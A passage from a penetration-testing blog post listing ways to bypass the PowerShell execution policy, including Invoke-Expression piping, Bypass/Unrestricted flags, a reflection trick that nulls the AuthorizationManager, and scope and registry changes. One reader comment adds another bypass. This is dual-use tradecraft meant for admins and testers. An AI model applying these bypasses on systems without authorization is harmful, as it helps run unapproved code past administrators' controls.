<div id="crayon-54d381c939b9d865507168" class="crayon-syntax crayon-theme-classic crayon-font-droid-sans-mono crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover wrap" style=" margin-top: 12px; margin-bottom: 12px; font-size: 13px !important; line-height: 15px !important;">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main" style="">
<table class="crayon-table">
<tbody><tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content" style="font-size: 13px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-54d381c939b9d865507168-1">1</div><div class="crayon-num" data-line="crayon-54d381c939b9d865507168-2">2</div><div class="crayon-num" data-line="crayon-54d381c939b9d865507168-3">3</div></div>
</td>
<td class="crayon-code"><div class="crayon-pre" style="font-size: 13px !important; line-height: 15px !important; -moz-tab-size:2; -o-tab-size:2; -webkit-tab-size:2; tab-size:2;"><div class="crayon-line" id="crayon-54d381c939b9d865507168-1">&nbsp;</div><div class="crayon-line" id="crayon-54d381c939b9d865507168-2"><span class="crayon-v">Get</span><span class="crayon-o">-</span><span class="crayon-i">Content</span><span class="crayon-h"> </span><span class="crayon-sy">.</span><span class="crayon-v">runme</span><span class="crayon-sy">.</span><span class="crayon-v">ps1</span><span class="crayon-h"> </span><span class="crayon-o">|</span><span class="crayon-h"> </span><span class="crayon-v">Invoke</span><span class="crayon-o">-</span><span class="crayon-i">Expression</span></div><div class="crayon-line" id="crayon-54d381c939b9d865507168-3">&nbsp;</div></div></td>
</tr>
</tbody></table>
</div>
</div>
<!-- [Format Time: 0.0005 seconds] -->
<p> <img alt="" src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/Powershell_Bypass_12.png"></p>
<p> <em>Example 2: Short command using Get-Content</em></p><!-- Crayon Syntax Highlighter v2.6.9 -->
<div id="crayon-54d381c939ba1612808832" class="crayon-syntax crayon-theme-classic crayon-font-droid-sans-mono crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover wrap" style=" margin-top: 12px; margin-bottom: 12px; font-size: 13px !important; line-height: 15px !important;">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main" style="">
<table class="crayon-table">
<tbody><tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content" style="font-size: 13px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-54d381c939ba1612808832-1">1</div><div class="crayon-num" data-line="crayon-54d381c939ba1612808832-2">2</div><div class="crayon-num" data-line="crayon-54d381c939ba1612808832-3">3</div></div>
</td>
<td class="crayon-code"><div class="crayon-pre" style="font-size: 13px !important; line-height: 15px !important; -moz-tab-size:2; -o-tab-size:2; -webkit-tab-size:2; tab-size:2;"><div class="crayon-line" id="crayon-54d381c939ba1612808832-1">&nbsp;</div><div class="crayon-line" id="crayon-54d381c939ba1612808832-2"><span class="crayon-i">GC</span><span class="crayon-h"> </span><span class="crayon-sy">.</span><span class="crayon-v">runme</span><span class="crayon-sy">.</span><span class="crayon-v">ps1</span><span class="crayon-h"> </span><span class="crayon-o">|</span><span class="crayon-h"> </span><span class="crayon-i">iex</span></div><div class="crayon-line" id="crayon-54d381c939ba1612808832-3">&nbsp;</div></div></td>
</tr>
</tbody></table>
</div>
</div>
<!-- [Format Time: 0.0004 seconds] -->
<p> </p></li>
<li>
<h4>Use the “Bypass” Execution Policy Flag</h4>
<p> This is a nice flag added by Microsoft that will bypass the
execution policy when you're executing scripts from a file. When this
flag is used Microsoft states that “Nothing is blocked and there are no
warnings or prompts”. This technique does not result in a configuration
change or require writing to disk.</p>
<p> </p><!-- Crayon Syntax Highlighter v2.6.9 -->
<div id="crayon-54d381c939ba6531430376" class="crayon-syntax crayon-theme-classic crayon-font-droid-sans-mono crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover wrap" style=" margin-top: 12px; margin-bottom: 12px; font-size: 13px !important; line-height: 15px !important;">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main" style="">
<table class="crayon-table">
<tbody><tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content" style="font-size: 13px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-54d381c939ba6531430376-1">1</div><div class="crayon-num" data-line="crayon-54d381c939ba6531430376-2">2</div><div class="crayon-num" data-line="crayon-54d381c939ba6531430376-3">3</div></div>
</td>
<td class="crayon-code"><div class="crayon-pre" style="font-size: 13px !important; line-height: 15px !important; -moz-tab-size:2; -o-tab-size:2; -webkit-tab-size:2; tab-size:2;"><div class="crayon-line" id="crayon-54d381c939ba6531430376-1">&nbsp;</div><div class="crayon-line" id="crayon-54d381c939ba6531430376-2"><span class="crayon-v">PowerShell</span><span class="crayon-sy">.</span><span class="crayon-v">exe</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-e">ExecutionPolicy </span><span class="crayon-v">Bypass</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-i">File</span><span class="crayon-h"> </span><span class="crayon-sy">.</span><span class="crayon-v">runme</span><span class="crayon-sy">.</span><span class="crayon-i">ps1</span></div><div class="crayon-line" id="crayon-54d381c939ba6531430376-3">&nbsp;</div></div></td>
</tr>
</tbody></table>
</div>
</div>
<!-- [Format Time: 0.0005 seconds] -->
<p> <img alt="" src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/Powershell_Bypass_13.png"></p></li>
<li>
<h4>Use the “Unrestricted” Execution Policy Flag</h4>
<p> This similar to the “Bypass” flag. However, when this flag is
used Microsoft states that it “Loads all configuration files and runs
all scripts. If you run an unsigned script that was downloaded from the
Internet, you are prompted for permission before it runs.” This
technique does not result in a configuration change or require writing
to disk.</p>
<p> </p><!-- Crayon Syntax Highlighter v2.6.9 -->
<div id="crayon-54d381c939bab127547528" class="crayon-syntax crayon-theme-classic crayon-font-droid-sans-mono crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover wrap" style=" margin-top: 12px; margin-bottom: 12px; font-size: 13px !important; line-height: 15px !important;">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main" style="">
<table class="crayon-table">
<tbody><tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content" style="font-size: 13px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-54d381c939bab127547528-1">1</div><div class="crayon-num" data-line="crayon-54d381c939bab127547528-2">2</div><div class="crayon-num" data-line="crayon-54d381c939bab127547528-3">3</div></div>
</td>
<td class="crayon-code"><div class="crayon-pre" style="font-size: 13px !important; line-height: 15px !important; -moz-tab-size:2; -o-tab-size:2; -webkit-tab-size:2; tab-size:2;"><div class="crayon-line" id="crayon-54d381c939bab127547528-1">&nbsp;</div><div class="crayon-line" id="crayon-54d381c939bab127547528-2"><span class="crayon-v">PowerShell</span><span class="crayon-sy">.</span><span class="crayon-v">exe</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-e">ExecutionPolicy </span><span class="crayon-v">UnRestricted</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-i">File</span><span class="crayon-h"> </span><span class="crayon-sy">.</span><span class="crayon-v">runme</span><span class="crayon-sy">.</span><span class="crayon-i">ps1</span></div><div class="crayon-line" id="crayon-54d381c939bab127547528-3">&nbsp;</div></div></td>
</tr>
</tbody></table>
</div>
</div>
<!-- [Format Time: 0.0005 seconds] -->
<p> <img alt="" src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/Powershell_Bypass_14.png"></p></li>
<li>
<h4>Use the “Remote-Signed” Execution Policy Flag</h4>
<p> Create your script then follow the tutorial <a target="_blank" href="http://www.darkoperator.com/blog/2013/3/5/powershell-basics-execution-policy-part-1.html">written by Carlos Perez</a> to sign it. Finally,run it using the command below:</p><!-- Crayon Syntax Highlighter v2.6.9 -->
<div id="crayon-54d381c939bb0274600477" class="crayon-syntax crayon-theme-classic crayon-font-droid-sans-mono crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover wrap" style=" margin-top: 12px; margin-bottom: 12px; font-size: 13px !important; line-height: 15px !important;">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main" style="">
<table class="crayon-table">
<tbody><tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content" style="font-size: 13px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-54d381c939bb0274600477-1">1</div><div class="crayon-num" data-line="crayon-54d381c939bb0274600477-2">2</div><div class="crayon-num" data-line="crayon-54d381c939bb0274600477-3">3</div></div>
</td>
<td class="crayon-code"><div class="crayon-pre" style="font-size: 13px !important; line-height: 15px !important; -moz-tab-size:2; -o-tab-size:2; -webkit-tab-size:2; tab-size:2;"><div class="crayon-line" id="crayon-54d381c939bb0274600477-1">&nbsp;</div><div class="crayon-line" id="crayon-54d381c939bb0274600477-2"><span class="crayon-v">PowerShell</span><span class="crayon-sy">.</span><span class="crayon-v">exe</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-e">ExecutionPolicy </span><span class="crayon-v">Remote</span><span class="crayon-o">-</span><span class="crayon-t">signed</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-i">File</span><span class="crayon-h"> </span><span class="crayon-sy">.</span><span class="crayon-v">runme</span><span class="crayon-sy">.</span><span class="crayon-i">ps1</span></div><div class="crayon-line" id="crayon-54d381c939bb0274600477-3">&nbsp;</div></div></td>
</tr>
</tbody></table>
</div>
</div>
<!-- [Format Time: 0.0006 seconds] -->
<p> </p></li>
<li>
<h4>Disable ExecutionPolicy by Swapping out the AuthorizationManager</h4>
<p> This is really creative one I came across on <a target="_blank" href="http://www.nivot.org/">http://www.nivot.org</a>.
The function below can be executed via an interactive PowerShell
console or by using the “command” switch. Once the function is called
it will swap out the “AuthorizationManager” with null. As a result, the
execution policy is essentially set to unrestricted for the remainder of
the session. This technique does not result in a persistant
configuration change or require writing to disk. However, it the change
will be applied for the duration of the session.</p>
<p> </p><!-- Crayon Syntax Highlighter v2.6.9 -->
<div id="crayon-54d381c939bb5783344665" class="crayon-syntax crayon-theme-classic crayon-font-droid-sans-mono crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover wrap" style=" margin-top: 12px; margin-bottom: 12px; font-size: 13px !important; line-height: 15px !important;">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main" style="">
<table class="crayon-table">
<tbody><tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content" style="font-size: 13px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-54d381c939bb5783344665-1">1</div><div class="crayon-num" data-line="crayon-54d381c939bb5783344665-2">2</div><div class="crayon-num" data-line="crayon-54d381c939bb5783344665-3">3</div></div>
</td>
<td class="crayon-code"><div class="crayon-pre" style="font-size: 13px !important; line-height: 15px !important; -moz-tab-size:2; -o-tab-size:2; -webkit-tab-size:2; tab-size:2;"><div class="crayon-line" id="crayon-54d381c939bb5783344665-1">&nbsp;</div><div class="crayon-line" id="crayon-54d381c939bb5783344665-2"><span class="crayon-t">function</span><span class="crayon-h"> </span><span class="crayon-e">Disable</span><span class="crayon-o">-</span><span class="crayon-e">ExecutionPolicy</span><span class="crayon-h"> </span><span class="crayon-sy">{</span><span class="crayon-sy">(</span><span class="crayon-sy">$</span><span class="crayon-v">ctx</span><span class="crayon-h"> </span><span class="crayon-o">=</span><span class="crayon-h"> </span><span class="crayon-sy">$</span><span class="crayon-v">executioncontext</span><span class="crayon-sy">.</span><span class="crayon-e">gettype</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span><span class="crayon-sy">.</span><span class="crayon-e">getfield</span><span class="crayon-sy">(</span><span class="crayon-s">"_context"</span><span class="crayon-sy">,</span><span class="crayon-s">"nonpublic,instance"</span><span class="crayon-sy">)</span><span class="crayon-sy">.</span><span class="crayon-e">getvalue</span><span class="crayon-sy">(</span><span class="crayon-h"> </span><span class="crayon-sy">$</span><span class="crayon-v">executioncontext</span><span class="crayon-sy">)</span><span class="crayon-sy">)</span><span class="crayon-sy">.</span><span class="crayon-e">gettype</span><span class="crayon-sy">(</span><span class="crayon-sy">)</span><span class="crayon-sy">.</span><span class="crayon-e">getfield</span><span class="crayon-sy">(</span><span class="crayon-s">"_authorizationManager"</span><span class="crayon-sy">,</span><span class="crayon-s">"nonpublic,instance"</span><span class="crayon-sy">)</span><span class="crayon-sy">.</span><span class="crayon-e">setvalue</span><span class="crayon-sy">(</span><span class="crayon-sy">$</span><span class="crayon-v">ctx</span><span class="crayon-sy">,</span><span class="crayon-h"> </span><span class="crayon-sy">(</span><span class="crayon-r">new</span><span class="crayon-o">-</span><span class="crayon-t">object</span><span class="crayon-h"> </span><span class="crayon-v">System</span><span class="crayon-sy">.</span><span class="crayon-v">Management</span><span class="crayon-sy">.</span><span class="crayon-v">Automation</span><span class="crayon-sy">.</span><span class="crayon-i">AuthorizationManager</span><span class="crayon-h"> </span><span class="crayon-s">"Microsoft.PowerShell"</span><span class="crayon-sy">)</span><span class="crayon-sy">)</span><span class="crayon-sy">}</span><span class="crayon-h">&nbsp;&nbsp;</span><span class="crayon-v">Disable</span><span class="crayon-o">-</span><span class="crayon-i">ExecutionPolicy</span><span class="crayon-h">&nbsp;&nbsp;</span><span class="crayon-sy">.</span><span class="crayon-v">runme</span><span class="crayon-sy">.</span><span class="crayon-i">ps1</span></div><div class="crayon-line" id="crayon-54d381c939bb5783344665-3">&nbsp;</div></div></td>
</tr>
</tbody></table>
</div>
</div>
<!-- [Format Time: 0.0021 seconds] -->
<p> <img alt="" src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/Powershell_Bypass_15.png"></p></li>
<li>
<h4>Set the ExcutionPolicy for the Process Scope</h4>
<p> As we saw in the introduction, the execution policy can be
applied at many levels. This includes the process which you have
control over. Using this technique the execution policy can be set to
unrestricted for the duration of your Session. Also, it does not result
in a configuration change, or require writing to the disk. I
originally found this technique on the <a target="_blank" href="http://roo7break.co.uk/?page_id=611">r007break blog</a>.</p>
<p> </p><!-- Crayon Syntax Highlighter v2.6.9 -->
<div id="crayon-54d381c939bba377269280" class="crayon-syntax crayon-theme-classic crayon-font-droid-sans-mono crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover wrap" style=" margin-top: 12px; margin-bottom: 12px; font-size: 13px !important; line-height: 15px !important;">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main" style="">
<table class="crayon-table">
<tbody><tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content" style="font-size: 13px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-54d381c939bba377269280-1">1</div><div class="crayon-num" data-line="crayon-54d381c939bba377269280-2">2</div><div class="crayon-num" data-line="crayon-54d381c939bba377269280-3">3</div></div>
</td>
<td class="crayon-code"><div class="crayon-pre" style="font-size: 13px !important; line-height: 15px !important; -moz-tab-size:2; -o-tab-size:2; -webkit-tab-size:2; tab-size:2;"><div class="crayon-line" id="crayon-54d381c939bba377269280-1">&nbsp;</div><div class="crayon-line" id="crayon-54d381c939bba377269280-2"><span class="crayon-v">Set</span><span class="crayon-o">-</span><span class="crayon-e">ExecutionPolicy </span><span class="crayon-v">Bypass</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-e">Scope </span><span class="crayon-i">Process</span></div><div class="crayon-line" id="crayon-54d381c939bba377269280-3">&nbsp;</div></div></td>
</tr>
</tbody></table>
</div>
</div>
<!-- [Format Time: 0.0004 seconds] -->
<p> <img alt="" src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/Powershell_Bypass_16.png"></p></li>
<li>
<h4>Set the ExcutionPolicy for the CurrentUser Scope via Command</h4>
<p> This option is similar to the process scope, but applies the
setting to the current user's environment persistently by modifying a
registry key. Also, it does not result in a configuration change, or
require writing to the disk. I originally found this technique on the <a target="_blank" href="http://roo7break.co.uk/?page_id=611">r007break blog</a></p>
<p> </p><!-- Crayon Syntax Highlighter v2.6.9 -->
<div id="crayon-54d381c939bbf890860620" class="crayon-syntax crayon-theme-classic crayon-font-droid-sans-mono crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover wrap" style=" margin-top: 12px; margin-bottom: 12px; font-size: 13px !important; line-height: 15px !important;">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main" style="">
<table class="crayon-table">
<tbody><tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content" style="font-size: 13px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-54d381c939bbf890860620-1">1</div><div class="crayon-num" data-line="crayon-54d381c939bbf890860620-2">2</div><div class="crayon-num" data-line="crayon-54d381c939bbf890860620-3">3</div></div>
</td>
<td class="crayon-code"><div class="crayon-pre" style="font-size: 13px !important; line-height: 15px !important; -moz-tab-size:2; -o-tab-size:2; -webkit-tab-size:2; tab-size:2;"><div class="crayon-line" id="crayon-54d381c939bbf890860620-1">&nbsp;</div><div class="crayon-line" id="crayon-54d381c939bbf890860620-2"><span class="crayon-v">Set</span><span class="crayon-o">-</span><span class="crayon-v">Executionpolicy</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-e">Scope </span><span class="crayon-v">CurrentUser</span><span class="crayon-h"> </span><span class="crayon-o">-</span><span class="crayon-e">ExecutionPolicy </span><span class="crayon-i">UnRestricted</span></div><div class="crayon-line" id="crayon-54d381c939bbf890860620-3">&nbsp;</div></div></td>
</tr>
</tbody></table>
</div>
</div>
<!-- [Format Time: 0.0006 seconds] -->
<p> <img alt="" src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/Powershell_Bypass_17.png"></p></li>
<li>
<h4>Set the ExcutionPolicy for the CurrentUser Scope via the Registry</h4>
<p> In this example I've shown how to change the execution policy
for the current user's environment persistently by modifying a registry
key directly.</p>
<p> </p><!-- Crayon Syntax Highlighter v2.6.9 -->
<div id="crayon-54d381c939bc4334089823" class="crayon-syntax crayon-theme-classic crayon-font-droid-sans-mono crayon-os-pc print-yes notranslate" data-settings=" minimize scroll-mouseover wrap" style=" margin-top: 12px; margin-bottom: 12px; font-size: 13px !important; line-height: 15px !important;">
<div class="crayon-plain-wrap"></div>
<div class="crayon-main" style="">
<table class="crayon-table">
<tbody><tr class="crayon-row">
<td class="crayon-nums " data-settings="hide">
<div class="crayon-nums-content" style="font-size: 13px !important; line-height: 15px !important;"><div class="crayon-num" data-line="crayon-54d381c939bc4334089823-1">1</div><div class="crayon-num" data-line="crayon-54d381c939bc4334089823-2">2</div><div class="crayon-num" data-line="crayon-54d381c939bc4334089823-3">3</div></div>
</td>
<td class="crayon-code"><div class="crayon-pre" style="font-size: 13px !important; line-height: 15px !important; -moz-tab-size:2; -o-tab-size:2; -webkit-tab-size:2; tab-size:2;"><div class="crayon-line" id="crayon-54d381c939bc4334089823-1">&nbsp;</div><div class="crayon-line" id="crayon-54d381c939bc4334089823-2"><span class="crayon-v">HKEY_CURRENT_USERSoftwareMicrosoftPowerShell1ShellIdsMicrosoft</span><span class="crayon-sy">.</span><span class="crayon-i">PowerShell</span></div><div class="crayon-line" id="crayon-54d381c939bc4334089823-3">&nbsp;</div></div></td>
</tr>
</tbody></table>
</div>
</div>
<!-- [Format Time: 0.0003 seconds] -->
<p> <img alt="" src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/Powershell_Bypass_18.png"></p></li>
</ol>
<h3>Wrap Up Summary</h3>
<p> I think the theme here is that the execution policy doesn't have to
be a hurdle for developers, admins, or pentesters. Microsoft never
intended it to be a security control. Which is why there are so many
options for bypassing it. Microsoft was nice enough to provide some
native options and the security community has also come up with some
really fun tricks. Thanks to all of those people who have contributed
through blogs and presentations. To the rest, good luck in all your
PowerShell adventures and don't forget to hack responsibly. <img src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/icon_wink.gif" alt=";)" class="wp-smiley"> </p>
<h3>References</h3>
<ul>
<li>http://blogs.msdn.com/b/powershell/archive/2008/09/30/powershell-s-security-guiding-principles.aspx</li>
<li>http://obscuresecurity.blogspot.com/2011/08/powershell-executionpolicy.html</li>
<li>http://roo7break.co.uk/?page_id=611</li>
<li>http://technet.microsoft.com/en-us/library/hh849694.aspx</li>
<li>http://technet.microsoft.com/en-us/library/hh849812.aspx</li>
<li>http://technet.microsoft.com/en-us/library/hh849893.aspx</li>
<li>http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html</li>
<li>http://www.hanselman.com/blog/SigningPowerShellScripts.aspx</li>
<li>http://www.darkoperator.com/blog/2013/3/5/powershell-basics-execution-policy-part-1.html</li>
<li>http://www.nivot.org/blog/post/2012/02/10/Bypassing-Restricted-Execution-Policy-in-Code-or-in-Scriptfrom </li>
<li>http://www.powershellmagazine.com/2014/07/08/powersploit/</li>
</ul>
</div>
<span class="blog-icon post-tags"><strong>Tags:</strong> <a href="https://blog.netspi.com/tag/powershell/" rel="tag">powershell</a></span></article>
<nav class="navigation post-navigation" role="navigation">
<h1 class="screen-reader-text">Post navigation</h1>
<div id="nav-below">
<div class="nav-previous"><div class="blog-entry-prev">Previous Post</div><a href="https://blog.netspi.com/cracking-stats-for-q2-2014/" rel="prev"><span class="meta-nav"></span>&nbsp;Cracking Stats for Q2 2014</a></div><div class="nav-next"><div class="blog-entry-next">Next Post</div><a href="https://blog.netspi.com/correlatedvm-from-a-pentesters-point-of-view/" rel="next">CorrelatedVM From a Pentesters Point of View&nbsp;<span class="meta-nav"></span></a></div> </div><!-- .nav-links -->
<div class="clearfix"></div>
</nav><!-- .navigation -->
<div id="comments" class="comments-area comments-section">
<h2 class="comments-title">
Comments
</h2>
<ul id="annotations" class="comment-list">
<li id="comment-1" class="comment even thread-even depth-1">
<article id="div-comment-1" class="comment-body">
<footer class="comment-meta">
<div class="comment-author vcard">
<img src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/ad516503a11cd5ca435acc9bb6523536.png" alt="" class="avatar avatar-32wp-user-avatar wp-user-avatar-32 alignnone photo avatar-default" height="32" width="32"> <b class="fn">essakhi</b> <span class="says">says:</span> </div><!-- .comment-author -->
<div class="comment-metadata">
<a href="https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/#comment-1">
<time datetime="2014-10-02T16:40:46+00:00">
October 2, 2014 at 4:40 pm </time>
</a>
</div><!-- .comment-metadata -->
</footer><!-- .comment-meta -->
<div class="comment-content">
<p>Thumb up for you. It is very interesting. Essakhi</p>
</div><!-- .comment-content -->
<div class="reply"><a class="comment-reply-link" href="https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/?replytocom=1#respond" onclick='return addComment.moveForm( "div-comment-1", "1", "respond", "1107" )' aria-label="Reply to essakhi">Reply</a></div> </article><!-- .comment-body -->
</li><!-- #comment-## -->
<li id="comment-26385" class="comment odd alt thread-odd thread-alt depth-1">
<article id="div-comment-26385" class="comment-body">
<footer class="comment-meta">
<div class="comment-author vcard">
<img src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/9959a2436be816294bf54e13709b264b.png" alt="" class="avatar avatar-32wp-user-avatar wp-user-avatar-32 alignnone photo avatar-default" height="32" width="32"> <b class="fn">Nicholas Bostwick</b> <span class="says">says:</span> </div><!-- .comment-author -->
<div class="comment-metadata">
<a href="https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/#comment-26385">
<time datetime="2014-11-19T14:10:06+00:00">
November 19, 2014 at 2:10 pm </time>
</a>
</div><!-- .comment-metadata -->
</footer><!-- .comment-meta -->
<div class="comment-content">
<p>Also another option is to to this:</p>
<p>$scriptcontents = [scriptblock]::create((get-content \\server\filepath.ps1|out-string))<br>
. $scriptcontents</p>
</div><!-- .comment-content -->
<div class="reply"><a class="comment-reply-link" href="https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/?replytocom=26385#respond" onclick='return addComment.moveForm( "div-comment-26385", "26385", "respond", "1107" )' aria-label="Reply to Nicholas Bostwick">Reply</a></div> </article><!-- .comment-body -->
</li><!-- #comment-## -->
</ul><!-- .comment-list -->
<div id="respond" class="comment-respond">
<h3 id="reply-title" class="comment-reply-title">Leave a Reply <small><a rel="nofollow" id="cancel-comment-reply-link" href="https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/#respond" style="display:none;">Cancel reply</a></small></h3>
<form action="https://blog.netspi.com/wp-comments-post.php" method="post" id="commentform" class="comment-form" novalidate="">
<p class="comment-notes"><span id="email-notes">Your email address will not be published.</span> Required fields are marked <span class="required">*</span></p> <p class="comment-form-author"><label for="author">Name <span class="required">*</span></label> <input id="author" name="author" size="30" aria-required="true" type="text"></p>
<p class="comment-form-email"><label for="email">Email <span class="required">*</span></label> <input id="email" name="email" size="30" aria-describedby="email-notes" aria-required="true" type="email"></p>
<p class="comment-form-url"><label for="url">Website</label> <input id="url" name="url" size="30" type="url"></p>
<p class="comment-form-comment"><label for="comment">Comment</label> <textarea id="comment" name="comment" cols="45" rows="8" aria-describedby="form-allowed-tags" aria-required="true"></textarea></p> <p class="form-submit">
<input name="submit" id="submit" class="submit" value="Post Comment" type="submit">
<input name="comment_post_ID" value="1107" id="comment_post_ID" type="hidden">
<input name="comment_parent" id="comment_parent" value="0" type="hidden">
</p>
<p style="display: none;"><input id="akismet_comment_nonce" name="akismet_comment_nonce" value="fa73d0ec33" type="hidden"></p><p style="display: none;"><input id="ak_js" name="ak_js" value="36" type="hidden"></p> </form>
</div><!-- #respond -->
</div><!-- #comments -->
</div>
<div class="offset1 pull-left span3 bg-white" style="background: transparent;">
<img src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/Scott_360x160-360x160.jpg" alt="Scott Sutherland" class="avatar avatar-320 wp-user-avatar wp-user-avatar-320 alignnone photo" height="142" width="320"> <div class="blog-colpad" style="background: rgb(255, 255, 255);">
<div class="post-author">
<h4>Article By <a href="https://blog.netspi.com/author/scott-sutherland" rel="author">Scott Sutherland</a></h4>
</div>
<div id="relatedPosts">
<h5>Related Posts</h5><ul> <li><a href="https://blog.netspi.com/decrypting-mssql-credential-passwords/" rel="bookmark" title="Decrypting MSSQL Credential Passwords">Decrypting MSSQL Credential Passwords</a></li>
<li><a href="https://blog.netspi.com/verifying-aslr-dep-and-safeseh-with-powershell/" rel="bookmark" title="Verifying ASLR, DEP, and SafeSEH with PowerShell">Verifying ASLR, DEP, and SafeSEH with PowerShell</a></li>
<li><a href="https://blog.netspi.com/locate-and-attack-domain-sql-servers-without-scanning/" rel="bookmark" title="Locate and Attack Domain SQL Servers without Scanning">Locate and Attack Domain SQL Servers without Scanning</a></li>
<li><a href="https://blog.netspi.com/executing-msf-payloads-via-powershell-webshellery/" rel="bookmark" title="Executing MSF Payloads via PowerShell Webshellery">Executing MSF Payloads via PowerShell Webshellery</a></li>
<li><a href="https://blog.netspi.com/decrypting-mssql-database-link-server-passwords/" rel="bookmark" title="Decrypting MSSQL Database Link Server Passwords">Decrypting MSSQL Database Link Server Passwords</a></li>
</ul> </div>
<div class="whitepaper-cta">
<h3>Read our White Papers for more information</h3>
<a href="https://netspi.com/resources/white-papers"><img src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/learn-more.png" alt="Lean more about our Whitepapers"></a>
</div>
</div>
</div>
</div>
</div>
</main><!-- #main -->
</div><!-- #primary -->
</div>
</div>
<footer>
<div class="container">
<div id="footer-top" class="pull-left row">
<div class="pull-left span3">
<img class="expertise-img" src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/expertise-in-action.png" alt="Expertise in Action" height="67" width="261">
</div>
<div class="pull-left span3 bg-lightblue">
<div class="footer-top-box">
<a href="https://www.netspi.com/resources/white-papers">
<h3>White Papers</h3>
<p>Topics include pen testing, assessment scanning, mobile apps, security code reviews, best practices, industry issues, and more…</p>
<div class="arrow-bg"></div>
</a>
</div>
</div>
<div class="pull-left span3 bg-blue">
<div class="footer-top-box">
<a href="https://www.netspi.com/resources/webinars">
<h3>Webinars</h3>
<p>Live and pre-recorded events. Request a one-on-one presentation.</p>
<div class="arrow-bg"></div>
</a>
</div>
</div>
<div class="pull-left span3 bg-iris">
<div class="footer-top-box">
<a href="https://www.netspi.com/resources/case-studies">
<h3>Case Studies</h3>
<p>Discover how NetSPI delivers deeper testing, better services,
and additional benefits to real clients in a variety of industries.</p>
<div class="arrow-bg"></div>
</a>
</div>
</div>
</div>
</div>
<div id="footer-bottom">
<div class="container">
<div id="footer-buttons" class="pull-left">
<div class="footer-btn">
<a href="https://www.netspi.com/netspi-difference/correlatedvm"><img src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/view-cvm-demo.png" alt="View CVM Demo" height="53" width="196"></a>
</div>
<div class="footer-btn">
<a href="https://www.netspi.com/about/contact"><img src="15%20Ways%20to%20Bypass%20the%20PowerShell%20Execution%20Policy-Dateien/contact-sales.png" alt="Contact Sales" height="53" width="196"></a>
</div>
</div>
<div id="footer-title" class="pull-left">
<h3>Moving Pen Testing Forward - <br>In-depth, deep dive, manual testing by experts powered by NetSPIs CorrelatedVM Engine</h3>
<div id="copyright">
<span id="dnn_Footer_dnnCopyright_lblCopyright" class="SkinObject">Copyright 2015 by NetSPI. All rights reserved.</span>
<br>
</div>
</div>
<div id="footer-address" class="pull-left span2" itemscope="" itemtype="http://schema.org/Organization">
<address itemprop="address" itemscope="" itemtype="http://schema.org/PostalAddress">
<span itemprop="streetAddress">800 Washington Ave N<br> Suite 670<br></span>
